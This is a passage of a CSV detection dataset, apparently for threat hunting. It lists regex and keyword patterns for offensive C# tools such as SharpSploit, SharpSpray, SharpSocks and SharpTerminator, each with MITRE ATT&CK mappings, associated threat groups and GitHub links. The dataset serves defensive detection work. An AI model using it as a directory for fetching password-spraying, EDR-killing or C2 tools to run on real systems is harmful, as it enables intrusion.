Movement","https://github.com/DarkCoderSc/SharpShellPipe","1","1","N/A","N/A","8","2","118","14","2025-02-21T12:33:43Z","2023-08-25T15:18:30Z","11091" "*/SharpShooter.git*",".{0,1000}\/SharpShooter\.git.{0,1000}","offensive_tool_keyword","SharpShooter","Payload Generation Framework","T1027 - T1059","TA0042","N/A","N/A","Resource Development","https://github.com/mdsecactivebreach/SharpShooter","1","1","N/A","N/A","10","10","1859","361","2024-08-21T12:09:54Z","2018-03-06T20:04:20Z","11092" 
"*/Sharp-SMBExec.exe*",".{0,1000}\/Sharp\-SMBExec\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","11093" "*/Sharp-SMBExec.exe*",".{0,1000}\/Sharp\-SMBExec\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta - APT20 - PowerPool","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","11094" "*/SharpSniper.exe*",".{0,1000}\/SharpSniper\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","11095" "*/SharpSniper.exe*",".{0,1000}\/SharpSniper\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","11096" "*/SharpSocks*",".{0,1000}\/SharpSocks.{0,1000}","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","1","N/A","N/A","10","10","482","84","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z","11097" "*/sharpsocks.log*",".{0,1000}\/sharpsocks\.log.{0,1000}","offensive_tool_keyword","shad0w","A post exploitation framework designed to operate covertly on heavily monitored environments","T1071 - T1090 - T1105 - T1571 - T1001","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/bats3c/shad0w","1","1","#logfile #linux","N/A","N/A","10","2090","332","2021-09-29T00:15:36Z","2020-04-28T16:42:07Z","11098" "*/SharpSocksServerCore.dll*",".{0,1000}\/SharpSocksServerCore\.dll.{0,1000}","offensive_tool_keyword","shad0w","A post exploitation framework designed to operate covertly on heavily monitored environments","T1071 - T1090 - T1105 - T1571 - T1001","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/bats3c/shad0w","1","1","N/A","N/A","N/A","10","2090","332","2021-09-29T00:15:36Z","2020-04-28T16:42:07Z","11099" "*/SharpSphere.exe*",".{0,1000}\/SharpSphere\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - 
T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","11100" "*/SharpSphere.exe*",".{0,1000}\/SharpSphere\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","11101" "*/SharpSploit*",".{0,1000}\/SharpSploit.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","11102" "*/SharpSploit.dll*",".{0,1000}\/SharpSploit\.dll.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation 
tool","https://github.com/anthemtotheego/SharpSploitConsole","1","1","N/A","N/A","10","2","182","36","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z","11103" "*/SharpSploit.git*",".{0,1000}\/SharpSploit\.git.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","1","N/A","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","11104" "*/SharpSploit/*",".{0,1000}\/SharpSploit\/.{0,1000}","offensive_tool_keyword","SharpBlock","A method of bypassing EDR active projection DLL by preventing entry point exection","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CCob/SharpBlock","1","1","N/A","N/A","10","10","1140","160","2021-03-31T09:44:48Z","2020-06-14T10:32:16Z","11105" "*/SharpSploitConsole.git*",".{0,1000}\/SharpSploitConsole\.git.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/anthemtotheego/SharpSploitConsole","1","1","N/A","N/A","10","2","182","36","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z","11106" "*/SharpSpoolTrigger*",".{0,1000}\/SharpSpoolTrigger.{0,1000}","offensive_tool_keyword","SharpSystemTriggers","Collection of remote authentication triggers in C#","T1078 - T1059.001 - T1550","TA0008 ","N/A","N/A","Lateral 
Movement","https://github.com/cube0x0/SharpSystemTriggers","1","1","N/A","N/A","10","5","483","57","2024-05-15T21:24:56Z","2021-09-12T18:18:15Z","11107" "*/SharpSpray.exe*",".{0,1000}\/SharpSpray\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","11108" "*/SharpSpray.exe*",".{0,1000}\/SharpSpray\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","11109" "*/SharpSpray.exe*",".{0,1000}\/SharpSpray\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","11110" "*/SharpSpray.exe*",".{0,1000}\/SharpSpray\.exe.{0,1000}","offensive_tool_keyword","SharpDomainSpray","Basic password spraying tool for internal tests and red teaming","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/HunnicCyber/SharpDomainSpray","1","1","N/A","N/A","10","1","90","18","2020-03-21T09:17:48Z","2019-06-05T10:47:05Z","11111" "*/sharpspray.exe*",".{0,1000}\/sharpspray\.exe.{0,1000}","offensive_tool_keyword","SharpSpray","SharpSpray is a Windows domain password spraying tool written in .NET C#","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/iomoath/SharpSpray","1","1","N/A","N/A","10","2","130","21","2021-11-25T19:13:56Z","2021-08-31T16:09:45Z","11112" "*/SharpSpray.git*",".{0,1000}\/SharpSpray\.git.{0,1000}","offensive_tool_keyword","SharpSpray","SharpSpray is a Windows domain password spraying tool written in .NET C#","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/iomoath/SharpSpray","1","1","N/A","N/A","10","2","130","21","2021-11-25T19:13:56Z","2021-08-31T16:09:45Z","11113" "*/SharpSpray-1.1.zip*",".{0,1000}\/SharpSpray\-1\.1\.zip.{0,1000}","offensive_tool_keyword","SharpSpray","SharpSpray is a Windows domain password spraying tool written in .NET C#","T1110","TA0006","N/A","N/A","Credential 
Access","https://github.com/iomoath/SharpSpray","1","1","N/A","N/A","10","2","130","21","2021-11-25T19:13:56Z","2021-08-31T16:09:45Z","11114" "*/SharpSpray1.exe*",".{0,1000}\/SharpSpray1\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","11115" "*/SharpSQL.exe*",".{0,1000}\/SharpSQL\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","SharpSQL","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","11116" "*/SharpSQL.exe*",".{0,1000}\/SharpSQL\.exe.{0,1000}","offensive_tool_keyword","SharpSQL","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation 
tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","SharpSQL","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","11117" "*/SharpSQLDump.exe*",".{0,1000}\/SharpSQLDump\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","11118" "*/SharpSQLPwn.exe*",".{0,1000}\/SharpSQLPwn\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","11119" "*/SharpSQLPwn.exe*",".{0,1000}\/SharpSQLPwn\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","11120" "*/SharpSQLTools.exe*",".{0,1000}\/SharpSQLTools\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","11121" "*/SharpSSDP.git*",".{0,1000}\/SharpSSDP\.git.{0,1000}","offensive_tool_keyword","SharpSSDP"," execute SharpSSDP.exe through Cobalt Strike's Beacon ""execute-assembly"" module to discover SSDP related services","T1046 - T1016","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/rvrsh3ll/SharpSSDP","1","1","N/A","N/A","7","1","17","4","2018-12-16T17:14:28Z","2018-12-16T17:14:12Z","11122" "*/SharpSSDP/*",".{0,1000}\/SharpSSDP\/.{0,1000}","offensive_tool_keyword","SharpSSDP"," execute SharpSSDP.exe through Cobalt Strike's Beacon ""execute-assembly"" module to discover SSDP related services","T1046 - 
T1016","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/rvrsh3ll/SharpSSDP","1","1","N/A","N/A","7","1","17","4","2018-12-16T17:14:28Z","2018-12-16T17:14:12Z","11123" "*/SharpStay.exe*",".{0,1000}\/SharpStay\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","11124" "*/SharpStay.exe*",".{0,1000}\/SharpStay\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","11125" "*/SharpStay.exe*",".{0,1000}\/SharpStay\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","11126" "*/SharpStay.git*",".{0,1000}\/SharpStay\.git.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","Persistence","https://github.com/0xthirteen/SharpStay","1","1","N/A","N/A","10","5","475","97","2024-06-26T15:54:52Z","2020-01-24T22:22:07Z","11127" "*/SharpStay/*",".{0,1000}\/SharpStay\/.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","Persistence","https://github.com/0xthirteen/SharpStay","1","1","N/A","N/A","10","5","475","97","2024-06-26T15:54:52Z","2020-01-24T22:22:07Z","11128" "*/SharpSvc.exe*",".{0,1000}\/SharpSvc\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","11129" "*/SharpSvc.exe*",".{0,1000}\/SharpSvc\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","11130" "*/SharpSword.git*",".{0,1000}\/SharpSword\.git.{0,1000}","offensive_tool_keyword","SharpSword","Read the contents of MS Word Documents using Cobalt Strike's Execute-Assembly","T1562.004 - T1059.001 - T1021.003","TA0005 - TA0002","N/A","N/A","C2","https://github.com/OG-Sadpanda/SharpSword","1","1","N/A","N/A","8","10","117","11","2024-09-30T15:21:25Z","2021-07-15T14:50:05Z","11131" "*/SharpSword/SharpSword*",".{0,1000}\/SharpSword\/SharpSword.{0,1000}","offensive_tool_keyword","cobaltstrike","Read the contents of DOCX files using Cobalt Strike's Execute-Assembly","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - 
AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/OG-Sadpanda/SharpSword","1","1","N/A","N/A","10","10","117","11","2024-09-30T15:21:25Z","2021-07-15T14:50:05Z","11132" "*/SharpSystemTriggers*",".{0,1000}\/SharpSystemTriggers.{0,1000}","offensive_tool_keyword","SharpSystemTriggers","Collection of remote authentication triggers in C#","T1078 - T1059.001 - T1550","TA0008 ","N/A","N/A","Lateral Movement","https://github.com/cube0x0/SharpSystemTriggers","1","1","N/A","N/A","10","5","483","57","2024-05-15T21:24:56Z","2021-09-12T18:18:15Z","11133" "*/SharpTask.exe*",".{0,1000}\/SharpTask\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","11134" "*/SharpTask.exe*",".{0,1000}\/SharpTask\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp 
Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","11135" "*/SharpTask.exe*",".{0,1000}\/SharpTask\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","11136" "*/SharpTerminator/*",".{0,1000}\/SharpTerminator\/.{0,1000}","offensive_tool_keyword","SharpTerminator","Terminate AV/EDR Processes using kernel driver","T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001","TA0007 - TA0008 - TA0006 - TA0002","N/A","N/A","Exploitation tool","https://github.com/mertdas/SharpTerminator","1","1","N/A","N/A","10","4","341","66","2023-06-12T00:38:54Z","2023-06-11T06:35:51Z","11137" "*/SharpThief.git*",".{0,1000}\/SharpThief\.git.{0,1000}","offensive_tool_keyword","SharpThief","A one-click program to steal the icon, resource information, version information, modification time, and digital signature (invalid) to make the program appear legitimate","T1036 - T1070 - T1078 - T1027 - T1202","TA0005 - TA0002 - TA0001","N/A","N/A","Defense 
Evasion","https://github.com/INotGreen/SharpThief","1","1","N/A","N/A","8","4","372","37","2024-12-17T05:46:39Z","2024-03-05T05:34:50Z","11138" "*/SharpThief/tarball*",".{0,1000}\/SharpThief\/tarball.{0,1000}","offensive_tool_keyword","SharpThief","A one-click program to steal the icon, resource information, version information, modification time, and digital signature (invalid) to make the program appear legitimate","T1036 - T1070 - T1078 - T1027 - T1202","TA0005 - TA0002 - TA0001","N/A","N/A","Defense Evasion","https://github.com/INotGreen/SharpThief","1","1","N/A","N/A","8","4","372","37","2024-12-17T05:46:39Z","2024-03-05T05:34:50Z","11139" "*/SharpThief/zipball*",".{0,1000}\/SharpThief\/zipball.{0,1000}","offensive_tool_keyword","SharpThief","A one-click program to steal the icon, resource information, version information, modification time, and digital signature (invalid) to make the program appear legitimate","T1036 - T1070 - T1078 - T1027 - T1202","TA0005 - TA0002 - TA0001","N/A","N/A","Defense Evasion","https://github.com/INotGreen/SharpThief","1","1","N/A","N/A","8","4","372","37","2024-12-17T05:46:39Z","2024-03-05T05:34:50Z","11140" 